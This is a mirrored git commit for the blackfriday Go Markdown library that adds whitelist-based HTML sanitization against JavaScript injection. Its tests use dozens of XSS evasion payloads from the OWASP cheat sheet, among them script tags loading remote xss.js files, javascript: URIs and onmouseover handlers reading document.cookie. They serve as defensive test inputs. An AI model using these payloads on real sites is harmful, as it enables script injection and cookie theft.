mirror of
https://github.com/danog/blackfriday.git
synced 2024-11-26 20:14:43 +01:00
Rewrite protection against JavaScript injection
This drops the naive approach to <script> tag stripping and resorts to full sanitization of HTML. The general idea (and the regexps) are borrowed from Stack Exchange's PageDown JavaScript Markdown processor[1]. As in PageDown, it's implemented as a separate pass over the resulting HTML. Includes a metric ton (but not all) of the test cases from here[2]. Several are commented out since they don't pass yet. Stronger (but still incomplete) fix for #11. [1] http://code.google.com/p/pagedown/wiki/PageDown [2] https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
This commit is contained in:
parent
e02c392dc6
commit
55cd82008e
102
html.go
102
html.go
@ -18,6 +18,7 @@ package blackfriday
|
|||||||
import (
|
import (
|
||||||
"bytes"
|
"bytes"
|
||||||
"fmt"
|
"fmt"
|
||||||
|
"regexp"
|
||||||
"strconv"
|
"strconv"
|
||||||
"strings"
|
"strings"
|
||||||
)
|
)
|
||||||
@ -40,6 +41,41 @@ const (
|
|||||||
HTML_SMARTYPANTS_LATEX_DASHES // enable LaTeX-style dashes (with HTML_USE_SMARTYPANTS)
|
HTML_SMARTYPANTS_LATEX_DASHES // enable LaTeX-style dashes (with HTML_USE_SMARTYPANTS)
|
||||||
)
|
)
|
||||||
|
|
||||||
|
var (
	// tags lists the element names accepted as bare opening or closing tags
	// (no attributes) by tagWhitelist.
	tags = []string{
		"b", "blockquote", "code", "del", "dd", "dl", "dt", "em",
		"h1", "h2", "h3", "h4", "h5", "h6",
		"i", "kbd", "li", "ol", "p", "pre",
		"s", "sup", "sub", "strong", "strike", "ul",
	}

	// urlRe is the pattern fragment for an acceptable URL: it must start with
	// http://, https://, ftp:// or a single slash, followed by one or more
	// characters from a fixed set. It is spliced into anchorClean and imgClean.
	urlRe = `((https?|ftp):\/\/|\/)[-A-Za-z0-9+&@#\/%?=~_|!:,.;\(\)]+`

	// tagWhitelist matches exactly one attribute-free opening or closing tag
	// whose name is in tags, or a <br>/<hr> with at most one whitespace
	// character and an optional trailing slash.
	tagWhitelist = regexp.MustCompile(`^(<\/?(` + strings.Join(tags, "|") + `)>|<(br|hr)\s?\/?>)$`)

	// anchorClean matches </a>, or an <a> tag carrying an href that satisfies
	// urlRe optionally followed by a non-empty title attribute.
	anchorClean = regexp.MustCompile(`^(<a\shref="` + urlRe + `"(\stitle="[^"<>]+")?\s?>|<\/a>)$`)

	// imgClean matches an <img> tag whose src satisfies urlRe, optionally
	// followed by width, height (one to three digits each), alt and title
	// attributes, in that order.
	imgClean = regexp.MustCompile(`^(<img\ssrc="` + urlRe + `"(\swidth="\d{1,3}")?(\sheight="\d{1,3}")?(\salt="[^"<>]*")?(\stitle="[^"<>]*")?\s?\/?>)$`)
)
|
||||||
|
|
||||||
// Html is a type that implements the Renderer interface for HTML output.
|
// Html is a type that implements the Renderer interface for HTML output.
|
||||||
//
|
//
|
||||||
// Do not create this directly, instead use the HtmlRenderer function.
|
// Do not create this directly, instead use the HtmlRenderer function.
|
||||||
@ -137,6 +173,10 @@ func attrEscape(out *bytes.Buffer, src []byte) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// GetFlags returns the flags value stored on the Html renderer.
func (options *Html) GetFlags() int {
|
||||||
|
return options.flags
|
||||||
|
}
|
||||||
|
|
||||||
func (options *Html) Header(out *bytes.Buffer, text func() bool, level int) {
|
func (options *Html) Header(out *bytes.Buffer, text func() bool, level int) {
|
||||||
marker := out.Len()
|
marker := out.Len()
|
||||||
doubleSpace(out)
|
doubleSpace(out)
|
||||||
@ -168,32 +208,10 @@ func (options *Html) BlockHtml(out *bytes.Buffer, text []byte) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
doubleSpace(out)
|
doubleSpace(out)
|
||||||
if options.flags&HTML_SKIP_SCRIPT != 0 {
|
|
||||||
out.Write(stripTag(string(text), "script", "p"))
|
|
||||||
} else {
|
|
||||||
out.Write(text)
|
out.Write(text)
|
||||||
}
|
|
||||||
out.WriteByte('\n')
|
out.WriteByte('\n')
|
||||||
}
|
}
|
||||||
|
|
||||||
// stripTag swaps a tag element for newTag. Only the first '<' in text is
// examined: when findHtmlTagPos reports a match for tag there, the text after
// that '<' up to the reported end offset is replaced by newTag. Afterwards
// every literal "</tag>" is rewritten to "</newTag>". Text containing no '<'
// is returned unchanged.
//
// NOTE(review): end is obtained from a call on text[i:] but is then used to
// index text itself; presumably that is only correct when i == 0 — confirm
// against findHtmlTagPos.
func stripTag(text, tag, newTag string) []byte {
|
|
||||||
closeNewTag := fmt.Sprintf("</%s>", newTag)
|
|
||||||
i := 0
|
|
||||||
for i < len(text) && text[i] != '<' {
|
|
||||||
i++
|
|
||||||
}
|
|
||||||
if i == len(text) {
|
|
||||||
return []byte(text)
|
|
||||||
}
|
|
||||||
found, end := findHtmlTagPos([]byte(text[i:]), tag)
|
|
||||||
closeTag := fmt.Sprintf("</%s>", tag)
|
|
||||||
noOpen := text
|
|
||||||
if found {
|
|
||||||
noOpen = text[0:i+1] + newTag + text[end:]
|
|
||||||
}
|
|
||||||
return []byte(strings.Replace(noOpen, closeTag, closeNewTag, -1))
|
|
||||||
}
|
|
||||||
|
|
||||||
func (options *Html) HRule(out *bytes.Buffer) {
|
func (options *Html) HRule(out *bytes.Buffer) {
|
||||||
doubleSpace(out)
|
doubleSpace(out)
|
||||||
out.WriteString("<hr")
|
out.WriteString("<hr")
|
||||||
@ -781,6 +799,46 @@ func findHtmlTagPos(tag []byte, tagname string) (bool, int) {
|
|||||||
return false, -1
|
return false, -1
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func sanitizeHtml(html []byte) []byte {
|
||||||
|
var result []byte
|
||||||
|
for string(html) != "" {
|
||||||
|
skip, tag, rest := findHtmlTag(html)
|
||||||
|
html = rest
|
||||||
|
result = append(result, skip...)
|
||||||
|
result = append(result, sanitizeTag(tag)...)
|
||||||
|
}
|
||||||
|
return append(result, []byte("\n")...)
|
||||||
|
}
|
||||||
|
|
||||||
|
func sanitizeTag(tag []byte) []byte {
|
||||||
|
if tagWhitelist.Match(tag) || anchorClean.Match(tag) || imgClean.Match(tag) {
|
||||||
|
return tag
|
||||||
|
} else {
|
||||||
|
return []byte("")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// skipUntilChar returns the index of the first occurrence of char in text at
// or after start, or len(text) when char does not occur there. A start at or
// beyond len(text) is returned unchanged. start must not be negative.
func skipUntilChar(text []byte, start int, char byte) int {
	if start >= len(text) {
		return start
	}
	if off := bytes.IndexByte(text[start:], char); off >= 0 {
		return start + off
	}
	return len(text)
}
|
||||||
|
|
||||||
|
func findHtmlTag(html []byte) (skip, tag, rest []byte) {
|
||||||
|
start := skipUntilChar(html, 0, '<')
|
||||||
|
rightAngle := skipUntilCharIgnoreQuotes(html, start, '>')
|
||||||
|
if rightAngle > start {
|
||||||
|
skip = html[0:start]
|
||||||
|
tag = html[start : rightAngle+1]
|
||||||
|
rest = html[rightAngle+1:]
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
return []byte(""), []byte(""), []byte("")
|
||||||
|
}
|
||||||
|
|
||||||
func skipSpace(tag []byte, i int) int {
|
func skipSpace(tag []byte, i int) int {
|
||||||
for i < len(tag) && isspace(tag[i]) {
|
for i < len(tag) && isspace(tag[i]) {
|
||||||
i++
|
i++
|
||||||
|
105
inline_test.go
105
inline_test.go
@ -90,16 +90,117 @@ func TestRawHtmlTag(t *testing.T) {
|
|||||||
"<p>alert()</p>\n",
|
"<p>alert()</p>\n",
|
||||||
|
|
||||||
"<script>alert()</script>\n",
|
"<script>alert()</script>\n",
|
||||||
"<p>alert()</p>\n",
|
"alert()\n",
|
||||||
|
|
||||||
"<script src='foo'></script>\n",
|
"<script src='foo'></script>\n",
|
||||||
"<p></p>\n",
|
"\n",
|
||||||
|
|
||||||
|
"<script src='a>b'></script>\n",
|
||||||
|
"\n",
|
||||||
|
|
||||||
"zz <script src='foo'></script>\n",
|
"zz <script src='foo'></script>\n",
|
||||||
"<p>zz </p>\n",
|
"<p>zz </p>\n",
|
||||||
|
|
||||||
"zz <script src=foo></script>\n",
|
"zz <script src=foo></script>\n",
|
||||||
"<p>zz </p>\n",
|
"<p>zz </p>\n",
|
||||||
|
|
||||||
|
`<script><script src="http://example.com/exploit.js"></SCRIPT></script>`,
|
||||||
|
"\n",
|
||||||
|
|
||||||
|
`'';!--"<XSS>=&{()}`,
|
||||||
|
"<p>'';!--"=&{()}</p>\n",
|
||||||
|
|
||||||
|
"<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>",
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
"<SCRIPT \nSRC=http://ha.ckers.org/xss.js></SCRIPT>",
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
`<IMG SRC="javascript:alert('XSS');">`,
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
"<IMG SRC=javascript:alert('XSS')>",
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
"<IMG SRC=JaVaScRiPt:alert('XSS')>",
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
"<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>",
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
`<a onmouseover="alert(document.cookie)">xss link</a>`,
|
||||||
|
"<p>xss link</a></p>\n",
|
||||||
|
|
||||||
|
"<a onmouseover=alert(document.cookie)>xss link</a>",
|
||||||
|
"<p>xss link</a></p>\n",
|
||||||
|
|
||||||
|
// XXX: this doesn't pass yet
|
||||||
|
//`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`,
|
||||||
|
//"<p></p>\n",
|
||||||
|
|
||||||
|
"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
`<IMG SRC=# onmouseover="alert('xxs')">`,
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
`<IMG SRC= onmouseover="alert('xxs')">`,
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
`<IMG onmouseover="alert('xxs')">`,
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
"<IMG SRC=javascript:alert('XSS')>",
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
"<IMG SRC=javascript:alert('XSS')>",
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
"<IMG SRC=javascript:alert('XSS')>",
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
`<IMG SRC="javascriptascript:alert('XSS');">`,
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
`<IMG SRC="jav	ascript:alert('XSS');">`,
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
`<IMG SRC="jav
ascript:alert('XSS');">`,
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
`<IMG SRC="jav
ascript:alert('XSS');">`,
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
`<IMG SRC="  javascript:alert('XSS');">`,
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
`<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>`,
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
// XXX: this doesn't pass yet
|
||||||
|
//"<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>",
|
||||||
|
//"\n",
|
||||||
|
|
||||||
|
`<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>`,
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
// XXX: this doesn't pass yet
|
||||||
|
//`<<SCRIPT>alert("XSS");//<</SCRIPT>`,
|
||||||
|
//"",
|
||||||
|
|
||||||
|
"<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >",
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
"<SCRIPT SRC=//ha.ckers.org/.j>",
|
||||||
|
"<p></p>\n",
|
||||||
|
|
||||||
|
// XXX: this doesn't pass yet
|
||||||
|
//`<IMG SRC="javascript:alert('XSS')"`,
|
||||||
|
//"",
|
||||||
|
|
||||||
|
// XXX: this doesn't pass yet
|
||||||
|
//"<iframe src=http://ha.ckers.org/scriptlet.html <",
|
||||||
|
//"",
|
||||||
}
|
}
|
||||||
doTestsInlineParam(t, tests, 0, HTML_SKIP_STYLE|HTML_SKIP_SCRIPT)
|
doTestsInlineParam(t, tests, 0, HTML_SKIP_STYLE|HTML_SKIP_SCRIPT)
|
||||||
}
|
}
|
||||||
|
4
latex.go
4
latex.go
@ -34,6 +34,10 @@ func LatexRenderer(flags int) Renderer {
|
|||||||
return &Latex{}
|
return &Latex{}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// GetFlags always returns 0 for the Latex renderer.
func (options *Latex) GetFlags() int {
|
||||||
|
return 0
|
||||||
|
}
|
||||||
|
|
||||||
// render code chunks using verbatim, or listings if we have a language
|
// render code chunks using verbatim, or listings if we have a language
|
||||||
func (options *Latex) BlockCode(out *bytes.Buffer, text []byte, lang string) {
|
func (options *Latex) BlockCode(out *bytes.Buffer, text []byte, lang string) {
|
||||||
if lang == "" {
|
if lang == "" {
|
||||||
|
@ -165,6 +165,8 @@ type Renderer interface {
|
|||||||
// Header and footer
|
// Header and footer
|
||||||
DocumentHeader(out *bytes.Buffer)
|
DocumentHeader(out *bytes.Buffer)
|
||||||
DocumentFooter(out *bytes.Buffer)
|
DocumentFooter(out *bytes.Buffer)
|
||||||
|
|
||||||
|
GetFlags() int
|
||||||
}
|
}
|
||||||
|
|
||||||
// Callback functions for inline parsing. One such function is defined
|
// Callback functions for inline parsing. One such function is defined
|
||||||
@ -291,6 +293,10 @@ func Markdown(input []byte, renderer Renderer, extensions int) []byte {
|
|||||||
first := firstPass(p, input)
|
first := firstPass(p, input)
|
||||||
second := secondPass(p, first)
|
second := secondPass(p, first)
|
||||||
|
|
||||||
|
if renderer.GetFlags()&HTML_SKIP_SCRIPT != 0 {
|
||||||
|
second = sanitizeHtml(second)
|
||||||
|
}
|
||||||
|
|
||||||
return second
|
return second
|
||||||
}
|
}
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user